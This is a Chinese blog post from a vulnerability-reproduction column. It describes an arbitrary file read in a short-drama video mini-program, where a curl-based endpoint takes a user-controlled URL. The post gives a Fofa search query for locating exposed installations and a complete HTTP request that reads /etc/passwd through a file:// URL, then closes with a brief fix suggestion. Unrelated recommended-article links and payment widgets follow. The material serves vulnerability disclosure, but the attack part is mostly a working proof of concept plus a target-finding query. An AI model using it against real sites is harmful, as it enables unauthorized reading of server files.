短剧影视小程序任意文件读取

最新推荐文章于 2024-10-11 20:54:01 发布
最新推荐文章于 2024-10-11 20:54:01 发布
阅读量653 收藏 4
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141994170
版权

1 漏洞描述:

任意文件读取:

在/Ems.php 控制器中的 juhecurl 方法存在curl_exec函数,且参数url为用户可控,导致漏洞产生

2 搜索语句:

Fofa:

"/VwmRIfEYDH.php"

 

3 漏洞复现:

poc

GET /api/ems/juhecurl?url=file:///etc/passwd HTTP/1.1
Host: your-ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

 

4 修复建议:

 控制用户传参限制,接口加上权限校验。

天官赐福万无禁忌
关注
专栏目录
短剧影视小程序前台未授权访问与任意文件读取
iSee857的博客
09-02 408
在Index.php方法中查询了网站中User表里的所有字段,并将用户枚举出来,因为$noNeedLogin = ['*']导致可未授权访问。在/Ems.php 控制器中的 juhecurl 方法存在curl_exec函数,且参数url为用户可控,导致漏洞产生。控制用户传参限制,接口加上权限校验。md5碰撞得明文密码。
小程序是如何设计百亿级用户画像分析系统的?
SmartSi
10-12 322
We 分析是小程序官方推出的、面向小程序服务商的数据分析平台,其中画像洞察是一个重要的功模块。该功能将为使用者提供基础的画像标签分析能力,提供自定义的用户分群功能,从而满足更多个性化的分析需求及支撑更多的画像应用场景。在此之前,原有 MP 的画像分析仅有基础画像,相当于只能分析小程序大盘固定周期的基础属性,而无法针对特定人群或自定义人群进行分析及应用。平台头部的使用者均希望平台提供完善的画像分析能力。除最基础的画像属性之外,也为使用者提供更丰富的标签及更灵活的用户分群应用能力。
2021年前端面试题及答案
热门推荐
Raleway的博客
02-11 17万+
前端面试汇总(2020年) 一 大纲 1、前言 2、前端工程化 3、前端设计模式 4、前端安全性问题 5、前端跨域问题 6、前端数据加密 7、前端http相关问题 8、*前端基础知识点面试题 9、前端技术栈问题 前言 由于冠肺炎疫情,现在成天呆在家里,加上也要准备面试,就在家里看面试题...
优酷、YouTube、Twitter及JustinTV几个视频网站的架构
密斯特拉·祖
06-02 5212
优酷视频网站架构一、网站基本数据概览据2010年统计,优酷网日均独立访问人数(uv)达到了8900万,日均访问量(pv)更是达到了17亿,优酷凭借这一数据成为google榜单中国内视频网站排名最高的厂商。硬件方面,优酷网引进的戴尔服务器主要以 PowerEdge 1950与PowerEdge 860为主,存储阵列以戴尔MD1000为主,2007的数据表明,优酷网已有1000多台服务器遍布在全国各大...
短视频直播怎么搭建_直播平台搭建流程
fofu33的专栏
11-05 2234
2020年,短视频和直播是非常火的,也是非常热闹的。短视频直播电商的时代来临了,那么如何搭建端视频直播平台呢,一般都有哪些流程。如果我们从事互联网创业,而不能和视频直播结合,那么两三年之后,将会被彻底拍死在沙滩上。 直播系统的特点 1、直播电商,为企业打造的卖货方式通过营造购物场景,给用户满满的消费临场感,通过弹幕、红包、关注等方式与商家实时互动,解决纯电商双方的消息不对称的问题,帮助商家打造场景化,激发用户的消费-,快速提升产品销量. 2、流量变现   直播卖货的主播变导购,能够让商家通过自带粉丝、自
2019最新Web前端经典面试试题及答案,持续更
weixin_37861326的博客
06-08 2万+
Ps: 文章所述内容,来源渠道平时积累以及网上摘录。按日期持续更...目录: 转载请注明来源。 -2018/6/8   1.position的定位方式 2.描述下从输入URL到整个网页加载完毕及显示在屏幕上的整个流程 3. 描述一下渐进增强和优雅降级之间的不同 -2018/6/10 1.如何解决跨域问题 2.XML和JSON的区别? 3.快速排序的思想并实现一个快排? -2018/6/16 w...
华为C++笔试题
hubinbin595959的专栏
10-30 3万+
1.写出判断ABCD四个表达式的是否正确, 若正确, 写出经过表达式中 a的值(3分) int a = 4; (A)a += (a++); (B) a += (++a) ;(C) (a++) += a;(D) (++a) += (a++); a = ? 答:C错误,左侧不是一个有效变量,不能赋值,可改为(++a) += a; 改后答案依次为9,10,10,11 2.某32位系统下, C
Python如此神奇,让繁琐工作自动化 (文中含Python基础)
程序员碉堡了的博客
06-06 502
“你在2个小时里完成的事,我们3个人要做两天。”21世纪早期,我的大学室友在一个电子产品零售商店工作。商店偶尔会收到一份电子表格,其中包含竞争对手的数千种产品的价格。由3个员工组成的团队,会将这个电子表格打印在一叠厚厚的纸上,然后3个人分一下。针对每个产品价格,他们会查看自己商店的价格,并记录竞争对手价格较低的所有产品。这通常会花几天的时间。 “如果你有打印件的原始文件,我会写一个程序来做这件事。”我的室友告诉他们,当时他看到他们坐在地板上,周围都是散落堆叠的纸张。 几个小时后,他写了一个简短的程序,从文.
python自动化办公入门书籍-Python如此神奇,让繁琐工作自动化 (文中含Python基础)...
q6q6q的专栏
10-28 642
原标题:Python如此神奇,让繁琐工作自动化 (文中含Python基础)"你在2个小时里完成的事,我们3个人要做两天。”21世纪早期,我的大学室友在一个电子产品零售商店工作。商店偶尔会收到一份电子表格,其中包含竞争对手的数千种产品的价格。由3个员工组成的团队,会将这个电子表格打印在一叠厚厚的纸上,然后3个人分一下。针对每个产品价格,他们会查看自己商店的价格,并记录竞争对手价格较低的所有...
2024最新小剧场短剧影视小程序源码
08-23
风口项目 ,短剧app 小程序 H5 多端程序 全网首家对接了易支付,修复了众多BUG 目前已知BUG全部修复
小剧场短剧影视小程序源码 全开源 带支付收益等模式 付费短剧小程序源码
01-15
此源码提供的是一个影视类的小程序,允许用户在微信等平台上浏览和购买短剧。 4. **前端HBuilder X源码**: HBuilder X是一个快速、高效的Web开发工具,支持HTML、CSS、JavaScript等前端技术。这里的前端源码使用...
小剧场短剧影视小程序源码 全开源 带支付等模式 付费短剧小程序源码-thinkphp源码
09-04
后端搭建1、导入数据库文件 dkewl.sql 2、设置运行目录 /public 3、伪静态设置 location / { index index.html index.htm index.php; if (!-e $request_filename) { rewrite ^(.*)$ /index.php?s=/$1 last; ...
小剧场短剧影视小程序源码 全开源 带支付等模式 付费短剧小程序源码.rar
04-21
小剧场短剧影视小程序源码 全开源 带支付收益等模式 付费短剧小程序源码 多平台小程序支持 项目功能介绍 支持无限滑动 高性能滑动 预加载 视频预览 支持剧情介绍,集合壁纸另外仿抖音滑动效果 支持会员模式,支持...
2024小剧场短剧影视小程序源码
01-03
2023短剧系统|追剧影视小程序|付费短视频小剧场|带支付收益等。前端支持打包 抖音小程序,快手小程序,百度小程序,H5和微信小程序 支持H5,APP多端支持,需要哪个端就发行到哪个端即可 前端文件需要用到HBuilder X...
如何安全地大规模部署 GenAI 应用程序
网络研究观
10-06 768
将生成式人工智能融入到你的商业模式中,既会带来的风险,也会带来的回报。以下是如何应对这些风险。
信息安全工程师(28)机房安全分析与防护
m0_73399576的博客
10-02 1197
信息安全工程师——机房安全分析与防护篇
【OCPP】ocpp1.6协议第5.19 Update Firmware章节的介绍及翻译
最新发布
qq_53871375的博客
10-11 166
在OCPP 1.6协议中,第5.19章节讨论了“Update Firmware”(更固件)的功能。这一章节主要描述了如何通过充电站管理系统(CSMS)远程更充电站的固件,以确保充电站能够支持最新的功能和修复已知的漏洞。该章节描述了通过远程操作更充电站固件的流程。固件更是维护充电站软件的一个关键部分,可以提高系统的稳定性、增加功能或修复安全问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值